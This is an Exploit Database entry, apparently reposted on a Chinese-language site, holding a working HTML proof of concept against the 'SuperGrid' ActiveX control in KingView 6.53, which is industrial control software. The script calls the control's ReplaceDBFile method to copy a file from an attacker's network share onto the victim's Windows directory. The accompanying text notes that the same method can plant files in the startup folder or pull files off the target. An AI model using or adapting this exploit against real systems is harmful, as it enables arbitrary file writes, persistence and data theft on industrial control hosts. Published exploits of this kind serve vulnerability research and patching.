KingView 6.53 – ‘SuperGrid’ Insecure ActiveX Control

• Exploit Database
• 9 阅读

• 作者： blake
  日期： 2013-09-04
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/28084/

• <html>
  <object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object>
  <!--
  KingView Insecure ActiveX Control - SuperGrid 
  Vendor: http://www.wellintech.com
  Version: KingView 6.53 
  Tested on: Windows XP SP3 / IE
  Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
  Author: Blake
  
  CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
  ProgId: SUPERGRIDLib.SuperGrid
  Path: C:\Program Files\KingView\SuperGrid.ocx
  MemberName: ReplaceDBFile
  Safe for scripting: False
  Safe for init: False
  Kill Bit: False
  IObject safety not implemented
  -->
  <title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
  <p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p>
  
  <input type=button onclick="copyfile()" value="Do It!">
  <script>
  function copyfile()
  {
  	var file1 = "\\\\192.168.1.165\\share\\poc.txt"; 			//source
  	var file2 = "c:\\WINDOWS\\poc.txt"; 					//destination
  	result = target.ReplaceDBFile(file1,file2);
  }
  
  </script>